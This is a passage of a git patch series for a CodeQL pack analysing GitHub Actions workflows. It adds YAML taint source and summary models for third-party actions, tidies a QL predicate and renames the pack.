/dev/null +++ b/ql/lib/ext/jsdaniell_create-json.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["jsdaniell/create-json", "*", "input.name", "output.successfully", "taint"] + - ["jsdaniell/create-json", "*", "input.json", "output.successfully", "taint"] + - ["jsdaniell/create-json", "*", "input.dir", "output.successfully", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/jwalton_gh-ecr-push.model.yml b/ql/lib/ext/jwalton_gh-ecr-push.model.yml new file mode 100644 index 000000000000..8ae3bb0035d0 --- /dev/null +++ b/ql/lib/ext/jwalton_gh-ecr-push.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["jwalton/gh-ecr-push", "*", "input.image", "output.imageUrl", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/khan_pull-request-comment-trigger.model.yml b/ql/lib/ext/khan_pull-request-comment-trigger.model.yml new file mode 100644 index 000000000000..d95c69bc5b18 --- /dev/null +++ b/ql/lib/ext/khan_pull-request-comment-trigger.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: sourceModel + data: + - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "issue_comment", ""] + - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "pull_request_comment", ""] \ No newline at end of file diff --git a/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml b/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml new file mode 100644 index 000000000000..3c60de5bb0a4 --- /dev/null +++ b/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["larsoner/circleci-artifacts-redirector-action", "*", "input.artifact-path", "output.url", "taint"] diff --git a/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml index 46a577d2f7e2..8358159bd405 100644 --- a/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml +++ b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml @@ -3,5 +3,5 @@ extensions: pack: codeql/actions-all extensible: summaryModel data: - - ["mad9000/actions-find-and-replace-string", "*", "source", "value", "taint"] - - ["mad9000/actions-find-and-replace-string", "*", "replace", "value", "taint"] \ No newline at end of file + - ["mad9000/actions-find-and-replace-string", "*", "input.source", "output.value", "taint"] + - ["mad9000/actions-find-and-replace-string", "*", "input.replace", "output.value", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/mattdavis0351_actions.model.yml b/ql/lib/ext/mattdavis0351_actions.model.yml new file mode 100644 index 000000000000..54302b86e837 --- /dev/null +++ b/ql/lib/ext/mattdavis0351_actions.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["mattdavis0351/actions", "*", "input.image-name", "output.imageUrl", "taint"] + - ["mattdavis0351/actions", "*", "input.tag", "output.imageUrl", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml b/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml new file mode 100644 index 000000000000..7904383d7076 --- /dev/null +++ b/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["metro-digital/setup-tools-for-waas", "*", "input.gcp_sa_key", "env.GCLOUD_PROJECT", "taint"] diff --git a/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml b/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml new file mode 100644 index 000000000000..0c283016c86b --- /dev/null +++ b/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["mishakav/pytest-coverage-comment", "*", "input.multiple-files", "output.summaryReport", "taint"] diff --git a/ql/lib/ext/mymindstorm_setup-emsdk.model.yml b/ql/lib/ext/mymindstorm_setup-emsdk.model.yml new file mode 100644 index 000000000000..2694ec2c453c --- /dev/null +++ b/ql/lib/ext/mymindstorm_setup-emsdk.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "env.EMSDK", "taint"] diff --git a/ql/lib/ext/ruby_setup-ruby.model.yml b/ql/lib/ext/ruby_setup-ruby.model.yml new file mode 100644 index 000000000000..aee6172b5915 --- /dev/null +++ b/ql/lib/ext/ruby_setup-ruby.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["ruby/setup-ruby", "*", "input.ruby-version", "output.ruby-prefix", "taint"] diff --git a/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml b/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml new file mode 100644 index 000000000000..2167b16c7ba7 --- /dev/null +++ b/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["salsify/action-detect-and-tag-new-version", "*", "input.tag-template", "output.tag", "taint"] diff --git a/ql/lib/ext/shallwefootball_upload-s3-action.model.yml b/ql/lib/ext/shallwefootball_upload-s3-action.model.yml new file mode 100644 index 000000000000..d90d7109fc2a --- /dev/null +++ b/ql/lib/ext/shallwefootball_upload-s3-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["shallwefootball/upload-s3-action", "*", "input.destination_dir", "output.object_key", "taint"] diff --git a/ql/lib/ext/shogo82148_actions-setup-perl.model.yml b/ql/lib/ext/shogo82148_actions-setup-perl.model.yml new file mode 100644 index 000000000000..20a412fd9b72 --- /dev/null +++ b/ql/lib/ext/shogo82148_actions-setup-perl.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["shogo82148/actions-setup-perl", "*", "input.working-directory", "env.PERL5LIB", "taint"] diff --git a/ql/lib/ext/suisei-cn_actions-download-file.model.yml b/ql/lib/ext/suisei-cn_actions-download-file.model.yml new file mode 100644 index 000000000000..8d0731c97921 --- /dev/null +++ b/ql/lib/ext/suisei-cn_actions-download-file.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["suisei-cn/actions-download-file", "*", "input.filename", "output.filename", "taint"] diff --git a/ql/lib/ext/timheuer_base64-to-file.model.yml b/ql/lib/ext/timheuer_base64-to-file.model.yml new file mode 100644 index 000000000000..9364fd747526 --- /dev/null +++ b/ql/lib/ext/timheuer_base64-to-file.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["timheuer/base64-to-file", "*", "input.fileName", "output.filePath", "taint"] + - ["timheuer/base64-to-file", "*", "input.fileDir", "output.filePath", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/tzkhan_pr-update-action.model.yml b/ql/lib/ext/tzkhan_pr-update-action.model.yml new file mode 100644 index 000000000000..f16b69c7af9d --- /dev/null +++ b/ql/lib/ext/tzkhan_pr-update-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: sourceModel + data: + - ["tzkhan/pr-update-action", "*", "output.headMatch", "pull_request_target", ""] diff --git a/ql/lib/ext/xt0rted_slash-command-action.model.yml b/ql/lib/ext/xt0rted_slash-command-action.model.yml new file mode 100644 index 000000000000..59a4c5b56522 --- /dev/null +++ b/ql/lib/ext/xt0rted_slash-command-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: sourceModel + data: + - ["xt0rted/slash-command-action", "*", "output.command-arguments", "issue_comment", ""] + - ["xt0rted/slash-command-action", "*", "output.command-arguments", "pull_request_comment", ""] From a28f8e90f071c29067eb4fa51a88a25e85dd57b1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 21 Feb 2024 16:50:33 +0100 Subject: [PATCH 066/707] Update ql/lib/ext/tj-actions_branch-names.model.yml --- ql/lib/ext/tj-actions_branch-names.model.yml | 1 - 1 file changed, 1 deletion(-) diff --git a/ql/lib/ext/tj-actions_branch-names.model.yml b/ql/lib/ext/tj-actions_branch-names.model.yml index 20383f415c28..1618eddf2d8e 100644 --- a/ql/lib/ext/tj-actions_branch-names.model.yml +++ b/ql/lib/ext/tj-actions_branch-names.model.yml @@ -4,7 +4,6 @@ extensions: extensible: sourceModel data: # https://github.com/tj-actions/branch-names - - ["tj-actions/branch-names", "*", "output.base_ref_branch", "pull_request_target", "PR base branch"] - ["tj-actions/branch-names", "*", "output.current_branch", "pull_request_target", "PR current branch"] - ["tj-actions/branch-names", "*", "output.head_ref_branch", "pull_request_target", "PR head branch"] - ["tj-actions/branch-names", "*", "output.ref_branch", "pull_request_target", "Branch tirggering workflow run"] From 3d5567d6988c4e4197014a2111393f003842b466 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 21 Feb 2024 16:50:44 +0100 Subject: [PATCH 067/707] Update ql/lib/codeql/actions/Ast.qll Co-authored-by: Jorge <46056498+jorgectf@users.noreply.github.com> --- ql/lib/codeql/actions/Ast.qll | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 2e93187b6bf0..8f04005be8f6 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -23,7 +23,7 @@ class AstNode instanceof YamlNode { class Statement extends AstNode { /** Gets the workflow that this job is a part of. */ WorkflowStmt getEnclosingWorkflowStmt() { - exists(WorkflowStmt w | w.getAChildNode*() = this and result = w) + this = result.getAChildNode*() } } From 9e2be7d67445a3f9ff64ae614ac689b4dabb5b77 Mon Sep 17 00:00:00 2001 From: Jorge <46056498+jorgectf@users.noreply.github.com> Date: Wed, 21 Feb 2024 17:27:39 +0100 Subject: [PATCH 068/707] Apply suggestions from code review MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-authored-by: Alvaro Muñoz --- ql/lib/ext/franzdiebold_github-env-vars-action.model.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml index 8475cb66c02d..c08e6f1b3964 100644 --- a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml +++ b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml @@ -3,5 +3,5 @@ extensions: pack: codeql/actions-all extensible: sourceModel data: - - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_DESCRIPTION", "pull_request", "PR body"] - - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_TITLE", "pull_request", "PR title"] + - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_DESCRIPTION", "pull_request_target", "PR body"] + - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_TITLE", "pull_request_target", "PR title"] From d0b904a5907e7a1369de76723db344bf18381270 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 21 Feb 2024 21:57:45 +0100 Subject: [PATCH 069/707] Fix QLpack names --- ql/lib/ext/akhileshns_heroku-deploy.model.yml | 2 +- ql/lib/ext/android-actions_setup-android.model.yml | 4 ++-- ql/lib/ext/apple-actions_import-codesign-certs.model.yml | 4 ++-- ql/lib/ext/ashley-taylor_read-json-property-action.model.yml | 4 ++-- ql/lib/ext/ashley-taylor_regex-property-action.model.yml | 4 ++-- ql/lib/ext/aszc_change-string-case-action.model.yml | 2 +- ql/lib/ext/aws-actions_configure-aws-credentials.model.yml | 2 +- ql/lib/ext/bobheadxi_deployments.model.yml | 4 ++-- ql/lib/ext/bufbuild_buf-breaking-action.model.yml | 4 ++-- ql/lib/ext/bufbuild_buf-lint-action.model.yml | 4 ++-- ql/lib/ext/cachix_cachix-action.model.yml | 4 ++-- ql/lib/ext/coursier_cache-action.model.yml | 4 ++-- ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml | 4 ++-- ql/lib/ext/csexton_release-asset-action.model.yml | 2 +- ql/lib/ext/delaguardo_setup-clojure.model.yml | 2 +- ql/lib/ext/franzdiebold_github-env-vars-action.model.yml | 2 +- ql/lib/ext/game-ci_unity-test-runner.model.yml | 2 +- ql/lib/ext/getsentry_action-release.model.yml | 4 ++-- ql/lib/ext/github_codeql-action.model.yml | 2 +- ql/lib/ext/gradle_gradle-build-action.model.yml | 4 ++-- ql/lib/ext/haya14busa_action-cond.model.yml | 4 ++-- ql/lib/ext/hexlet_project-action.model.yml | 2 +- ql/lib/ext/jsdaniell_create-json.model.yml | 4 ++-- ql/lib/ext/jwalton_gh-ecr-push.model.yml | 4 ++-- ql/lib/ext/khan_pull-request-comment-trigger.model.yml | 4 ++-- .../larsoner_circleci-artifacts-redirector-action.model.yml | 2 +- ql/lib/ext/mattdavis0351_actions.model.yml | 4 ++-- ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml | 2 +- ql/lib/ext/mishakav_pytest-coverage-comment.model.yml | 2 +- ql/lib/ext/mymindstorm_setup-emsdk.model.yml | 2 +- ql/lib/ext/ruby_setup-ruby.model.yml | 2 +- .../ext/salsify_action-detect-and-tag-new-version.model.yml | 2 +- ql/lib/ext/shallwefootball_upload-s3-action.model.yml | 2 +- ql/lib/ext/shogo82148_actions-setup-perl.model.yml | 2 +- ql/lib/ext/suisei-cn_actions-download-file.model.yml | 2 +- ql/lib/ext/timheuer_base64-to-file.model.yml | 4 ++-- ql/lib/ext/tzkhan_pr-update-action.model.yml | 2 +- ql/lib/ext/xt0rted_slash-command-action.model.yml | 2 +- 38 files changed, 56 insertions(+), 56 deletions(-) diff --git a/ql/lib/ext/akhileshns_heroku-deploy.model.yml b/ql/lib/ext/akhileshns_heroku-deploy.model.yml index 73e49a1fb06c..f370a9fe2228 100644 --- a/ql/lib/ext/akhileshns_heroku-deploy.model.yml +++ b/ql/lib/ext/akhileshns_heroku-deploy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["akhileshns/heroku-deploy", "*", "input.branch", "output.status", "taint"] diff --git a/ql/lib/ext/android-actions_setup-android.model.yml b/ql/lib/ext/android-actions_setup-android.model.yml index 11ea0ae79228..5ecd36f0926f 100644 --- a/ql/lib/ext/android-actions_setup-android.model.yml +++ b/ql/lib/ext/android-actions_setup-android.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["android-actions/setup-android", "*", "input.cmdline-tools-version", "output.ANDROID_COMMANDLINE_TOOLS_VERSION", "taint"] \ No newline at end of file + - ["android-actions/setup-android", "*", "input.cmdline-tools-version", "output.ANDROID_COMMANDLINE_TOOLS_VERSION", "taint"] diff --git a/ql/lib/ext/apple-actions_import-codesign-certs.model.yml b/ql/lib/ext/apple-actions_import-codesign-certs.model.yml index 2fdf6c78d53f..b81f5c17ca22 100644 --- a/ql/lib/ext/apple-actions_import-codesign-certs.model.yml +++ b/ql/lib/ext/apple-actions_import-codesign-certs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["apple-actions/import-codesign-certs", "*", "input.keychain-password", "output.keychain-password", "taint"] \ No newline at end of file + - ["apple-actions/import-codesign-certs", "*", "input.keychain-password", "output.keychain-password", "taint"] diff --git a/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml b/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml index fb837050879e..5ab9fee16679 100644 --- a/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml +++ b/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["ashley-taylor/read-json-property-action", "*", "input.json", "output.value", "taint"] \ No newline at end of file + - ["ashley-taylor/read-json-property-action", "*", "input.json", "output.value", "taint"] diff --git a/ql/lib/ext/ashley-taylor_regex-property-action.model.yml b/ql/lib/ext/ashley-taylor_regex-property-action.model.yml index d3b929956d1b..a6e1364d218c 100644 --- a/ql/lib/ext/ashley-taylor_regex-property-action.model.yml +++ b/ql/lib/ext/ashley-taylor_regex-property-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["ashley-taylor/regex-property-action", "*", "input.replacement", "output.value", "taint"] - - ["ashley-taylor/regex-property-action", "*", "input.value", "output.value", "taint"] \ No newline at end of file + - ["ashley-taylor/regex-property-action", "*", "input.value", "output.value", "taint"] diff --git a/ql/lib/ext/aszc_change-string-case-action.model.yml b/ql/lib/ext/aszc_change-string-case-action.model.yml index f4527cf1b7f2..cfdbb0b825fb 100644 --- a/ql/lib/ext/aszc_change-string-case-action.model.yml +++ b/ql/lib/ext/aszc_change-string-case-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["aszc/change-string-case-action", "*", "input.string", "output.capitalized", "taint"] diff --git a/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml b/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml index f95100942954..26b3a1fd3df6 100644 --- a/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml +++ b/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["aws-actions/configure-aws-credentials", "*", "input.aws-access-key-id", "env.AWS_ACCESS_KEY_ID", "taint"] diff --git a/ql/lib/ext/bobheadxi_deployments.model.yml b/ql/lib/ext/bobheadxi_deployments.model.yml index a458e229e04d..2d8932d87fb5 100644 --- a/ql/lib/ext/bobheadxi_deployments.model.yml +++ b/ql/lib/ext/bobheadxi_deployments.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["bobheadxi/deployments", "*", "input.env", "output.env", "taint"] \ No newline at end of file + - ["bobheadxi/deployments", "*", "input.env", "output.env", "taint"] diff --git a/ql/lib/ext/bufbuild_buf-breaking-action.model.yml b/ql/lib/ext/bufbuild_buf-breaking-action.model.yml index a6cfbb6ee9e3..ee8e6abef097 100644 --- a/ql/lib/ext/bufbuild_buf-breaking-action.model.yml +++ b/ql/lib/ext/bufbuild_buf-breaking-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["bufbuild/buf-breaking-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint"] \ No newline at end of file + - ["bufbuild/buf-breaking-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint"] diff --git a/ql/lib/ext/bufbuild_buf-lint-action.model.yml b/ql/lib/ext/bufbuild_buf-lint-action.model.yml index 9fb754ea9e14..c58b5a1e1d2e 100644 --- a/ql/lib/ext/bufbuild_buf-lint-action.model.yml +++ b/ql/lib/ext/bufbuild_buf-lint-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["bufbuild/buf-lint-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint"] \ No newline at end of file + - ["bufbuild/buf-lint-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint"] diff --git a/ql/lib/ext/cachix_cachix-action.model.yml b/ql/lib/ext/cachix_cachix-action.model.yml index bd9563317fb5..1c6584eb9d5d 100644 --- a/ql/lib/ext/cachix_cachix-action.model.yml +++ b/ql/lib/ext/cachix_cachix-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["cachix/cachix-action", "*", "input.signingKey", "env.CACHIX_SIGNING_KEY", "taint"] \ No newline at end of file + - ["cachix/cachix-action", "*", "input.signingKey", "env.CACHIX_SIGNING_KEY", "taint"] diff --git a/ql/lib/ext/coursier_cache-action.model.yml b/ql/lib/ext/coursier_cache-action.model.yml index 951a297207de..bfb45dddb668 100644 --- a/ql/lib/ext/coursier_cache-action.model.yml +++ b/ql/lib/ext/coursier_cache-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["coursier/cache-action", "*", "input.path", "env.COURSIER_CACHE", "taint"] \ No newline at end of file + - ["coursier/cache-action", "*", "input.path", "env.COURSIER_CACHE", "taint"] diff --git a/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml b/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml index ab6458028a51..d4e35196c6c1 100644 --- a/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml +++ b/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["crazy-max/ghaction-import-gpg", "*", "input.fingerprint", "output.fingerprint", "taint"] \ No newline at end of file + - ["crazy-max/ghaction-import-gpg", "*", "input.fingerprint", "output.fingerprint", "taint"] diff --git a/ql/lib/ext/csexton_release-asset-action.model.yml b/ql/lib/ext/csexton_release-asset-action.model.yml index 084e3328dc84..60e35e66a4de 100644 --- a/ql/lib/ext/csexton_release-asset-action.model.yml +++ b/ql/lib/ext/csexton_release-asset-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["csexton/release-asset-action", "*", "input.release-url", "output.url", "taint"] diff --git a/ql/lib/ext/delaguardo_setup-clojure.model.yml b/ql/lib/ext/delaguardo_setup-clojure.model.yml index b2872259fe96..2aa6013c872a 100644 --- a/ql/lib/ext/delaguardo_setup-clojure.model.yml +++ b/ql/lib/ext/delaguardo_setup-clojure.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["delaguardo/setup-clojure", "*", "input.boot", "env.BOOT_VERSION", "taint"] diff --git a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml index c08e6f1b3964..ffde7dc6a918 100644 --- a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml +++ b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: sourceModel data: - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_DESCRIPTION", "pull_request_target", "PR body"] diff --git a/ql/lib/ext/game-ci_unity-test-runner.model.yml b/ql/lib/ext/game-ci_unity-test-runner.model.yml index a0d4b357b5a5..ab413b6e9759 100644 --- a/ql/lib/ext/game-ci_unity-test-runner.model.yml +++ b/ql/lib/ext/game-ci_unity-test-runner.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["game-ci/unity-test-runner", "*", "input.artifactsPath", "output.artifactsPath", "taint"] diff --git a/ql/lib/ext/getsentry_action-release.model.yml b/ql/lib/ext/getsentry_action-release.model.yml index d416a71c91d6..e6688f3805d0 100644 --- a/ql/lib/ext/getsentry_action-release.model.yml +++ b/ql/lib/ext/getsentry_action-release.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["getsentry/action-release", "*", "input.version", "output.version", "taint"] - - ["getsentry/action-release", "*", "input.version_prefix", "output.version", "taint"] \ No newline at end of file + - ["getsentry/action-release", "*", "input.version_prefix", "output.version", "taint"] diff --git a/ql/lib/ext/github_codeql-action.model.yml b/ql/lib/ext/github_codeql-action.model.yml index 3710f7e07b8a..b214178350c9 100644 --- a/ql/lib/ext/github_codeql-action.model.yml +++ b/ql/lib/ext/github_codeql-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["github/codeql-action", "*", "input.output", "output.sarif-output", "taint"] diff --git a/ql/lib/ext/gradle_gradle-build-action.model.yml b/ql/lib/ext/gradle_gradle-build-action.model.yml index 6ea8a6c68009..0534d299627b 100644 --- a/ql/lib/ext/gradle_gradle-build-action.model.yml +++ b/ql/lib/ext/gradle_gradle-build-action.model.yml @@ -1,8 +1,8 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["gradle/gradle-build-action", "*", "input.cache-encryption-key", "env.GRADLE_ENCRYPTION_KEY", "taint"] - ["gradle/gradle-build-action", "*", "input.build-scan-terms-of-service-agree", "env.BUILD_SCAN_TERMS_OF_SERVICE_AGREE", "taint"] - - ["gradle/gradle-build-action", "*", "input.build-scan-terms-of-service-url", "env.BUILD_SCAN_TERMS_OF_SERVICE_URL", "taint"] \ No newline at end of file + - ["gradle/gradle-build-action", "*", "input.build-scan-terms-of-service-url", "env.BUILD_SCAN_TERMS_OF_SERVICE_URL", "taint"] diff --git a/ql/lib/ext/haya14busa_action-cond.model.yml b/ql/lib/ext/haya14busa_action-cond.model.yml index f0e0752b7357..a8a528b85c5a 100644 --- a/ql/lib/ext/haya14busa_action-cond.model.yml +++ b/ql/lib/ext/haya14busa_action-cond.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["haya14busa/action-cond", "*", "input.if_true", "output.value", "taint"] - - ["haya14busa/action-cond", "*", "input.if_false", "output.value", "taint"] \ No newline at end of file + - ["haya14busa/action-cond", "*", "input.if_false", "output.value", "taint"] diff --git a/ql/lib/ext/hexlet_project-action.model.yml b/ql/lib/ext/hexlet_project-action.model.yml index 4499d91cab66..6a907fcc3a19 100644 --- a/ql/lib/ext/hexlet_project-action.model.yml +++ b/ql/lib/ext/hexlet_project-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["hexlet/project-action", "*", "input.mount-path", "env.PWD", "taint"] diff --git a/ql/lib/ext/jsdaniell_create-json.model.yml b/ql/lib/ext/jsdaniell_create-json.model.yml index a0f59b9e38b0..f1a04c9e2441 100644 --- a/ql/lib/ext/jsdaniell_create-json.model.yml +++ b/ql/lib/ext/jsdaniell_create-json.model.yml @@ -1,8 +1,8 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["jsdaniell/create-json", "*", "input.name", "output.successfully", "taint"] - ["jsdaniell/create-json", "*", "input.json", "output.successfully", "taint"] - - ["jsdaniell/create-json", "*", "input.dir", "output.successfully", "taint"] \ No newline at end of file + - ["jsdaniell/create-json", "*", "input.dir", "output.successfully", "taint"] diff --git a/ql/lib/ext/jwalton_gh-ecr-push.model.yml b/ql/lib/ext/jwalton_gh-ecr-push.model.yml index 8ae3bb0035d0..b237ac313d2a 100644 --- a/ql/lib/ext/jwalton_gh-ecr-push.model.yml +++ b/ql/lib/ext/jwalton_gh-ecr-push.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["jwalton/gh-ecr-push", "*", "input.image", "output.imageUrl", "taint"] \ No newline at end of file + - ["jwalton/gh-ecr-push", "*", "input.image", "output.imageUrl", "taint"] diff --git a/ql/lib/ext/khan_pull-request-comment-trigger.model.yml b/ql/lib/ext/khan_pull-request-comment-trigger.model.yml index d95c69bc5b18..b872bbe2ed04 100644 --- a/ql/lib/ext/khan_pull-request-comment-trigger.model.yml +++ b/ql/lib/ext/khan_pull-request-comment-trigger.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: sourceModel data: - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "issue_comment", ""] - - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "pull_request_comment", ""] \ No newline at end of file + - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "pull_request_comment", ""] diff --git a/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml b/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml index 3c60de5bb0a4..abfca93b4ec9 100644 --- a/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml +++ b/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["larsoner/circleci-artifacts-redirector-action", "*", "input.artifact-path", "output.url", "taint"] diff --git 